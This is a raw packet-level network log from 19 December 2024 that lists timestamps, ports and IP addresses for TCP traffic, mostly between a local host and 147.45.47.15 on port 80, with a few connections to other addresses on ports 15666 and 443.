Dec 19, 2024 08:52:39.499568939 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.499699116 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.499814034 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.500555038 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.500639915 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.500713110 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.501554012 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.501667023 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.501713037 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.502533913 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.502657890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.502706051 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.503616095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.503719091 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.503874063 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.504612923 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.504734039 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.504784107 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.505589008 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.505675077 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.506052971 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.506589890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.506709099 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.506750107 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.507643938 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.507774115 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.508070946 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.508085966 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.508619070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.508734941 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.508791924 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.509654045 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.509768963 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.509812117 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.510648012 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.510776043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.510917902 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.511646032 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.511718988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.511766911 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.512638092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.512772083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.512811899 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.513685942 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.513839006 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.514666080 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.514729977 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.514764071 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.514862061 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.515707016 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.515858889 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.515959978 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.516696930 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.516798973 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.517005920 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.517719030 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.517837048 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.517945051 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.518713951 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.518852949 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.518934011 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.519762993 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.519864082 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.519982100 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.520740986 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.520870924 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.521044016 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.521776915 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.521873951 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.522016048 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.522777081 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.522881985 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.522938013 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.523782015 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.523897886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.524077892 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.524792910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.524926901 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.525105953 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.525903940 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.525980949 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.526190996 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.526850939 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.526947975 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.527111053 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.527812958 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.527925968 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.527970076 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.528848886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.528939962 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.528994083 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.529881954 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.529978991 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.530143023 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.530893087 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.530978918 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.531166077 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.531951904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.532011986 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.532062054 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.532994986 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.533189058 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.533229113 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.534195900 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.534296989 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.534868002 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.534951925 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.535162926 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.535289049 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.535945892 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.536041975 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.536140919 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.536930084 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.537055016 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.538001060 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.538086891 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.538129091 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.538167953 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.539339066 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.539434910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.539489031 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.539975882 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.540071964 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.540234089 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.540996075 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.541095018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.541140079 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.542001963 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.542109013 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.542149067 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.543049097 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.543140888 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.543358088 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.543370962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.543397903 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.543435097 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.543669939 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.543868065 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.543915033 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.544051886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.544223070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.544265985 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.544785023 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.544884920 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.545085907 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.545128107 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.545248985 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.545892954 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.545955896 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.546046019 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.546143055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.546323061 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.546324968 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.546461105 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.546528101 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.547065973 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.547167063 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.547324896 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.547369003 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.547522068 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.547550917 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.548104048 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.548249960 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.548317909 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.548440933 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.548583984 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.548639059 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.549082994 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.549199104 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.549562931 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.549613953 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.549645901 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.549674034 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.550087929 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.550208092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.550251961 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.550692081 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.550848007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.550905943 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.551126957 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.551261902 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.551413059 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.551793098 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.551898003 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.551906109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.552117109 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.552236080 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.552392960 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.552922964 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.552977085 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.553019047 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.553191900 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.553368092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.554044962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.554121017 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.554169893 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.554183006 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.554193974 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.554491997 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.555152893 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.555214882 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.555272102 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.555284977 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.555300951 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.555608988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.555655003 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.556169033 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.556262016 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.556273937 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.556375980 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.556425095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.556598902 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.557194948 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.557302952 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.557349920 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.557493925 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.557506084 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.557538033 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.558203936 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.558298111 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.558480024 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.558532953 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.558638096 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.558648109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.559189081 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.559293032 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.559349060 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.559613943 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.559667110 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.559685946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.560230017 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.560378075 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.560429096 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.560725927 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.560872078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.560920000 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.561218023 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.561355114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.561419010 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.561826944 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.561870098 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.561954975 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.562247992 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.562382936 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.562978029 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.563035011 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.563045979 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.563074112 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.563237906 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.563445091 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.563499928 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.564090967 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.564135075 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.564171076 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.564383030 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.564394951 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.564436913 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.565180063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.565279007 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.565309048 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.565320015 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.565656900 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.565700054 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.566291094 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.566453934 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.566467047 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.566508055 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.566509008 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.566723108 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.567317009 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.567424059 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.567473888 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.567594051 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.567606926 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.567642927 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.568351984 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.568434000 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.568469048 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.568599939 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.568746090 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.568782091 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.569333076 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.569437981 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.569485903 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.569641113 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.569685936 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.569772959 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.570334911 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.570432901 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.570763111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.570822001 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.570877075 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.570890903 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.571336031 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.571455956 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.571681023 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.571928024 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.572048903 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.572068930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.572366953 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.572488070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.572594881 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.573045015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.573105097 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.573172092 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.574150085 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.574235916 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.574256897 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.575236082 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.575284958 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.575309038 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.586961031 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.587109089 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.587177038 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.639512062 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:39.654203892 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.667346001 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.759044886 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:39.759121895 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:39.818821907 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.038024902 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.041806936 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.094022989 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:40.094064951 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:40.094137907 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:40.158677101 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.167109966 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.170078993 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:40.170171022 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:40.278624058 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.278728008 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.278744936 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.278800011 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.286739111 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.286822081 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.286838055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.286849976 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.286885977 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.287127018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.287343979 CET	80	49731	147.45.47.15	192.168.2.4
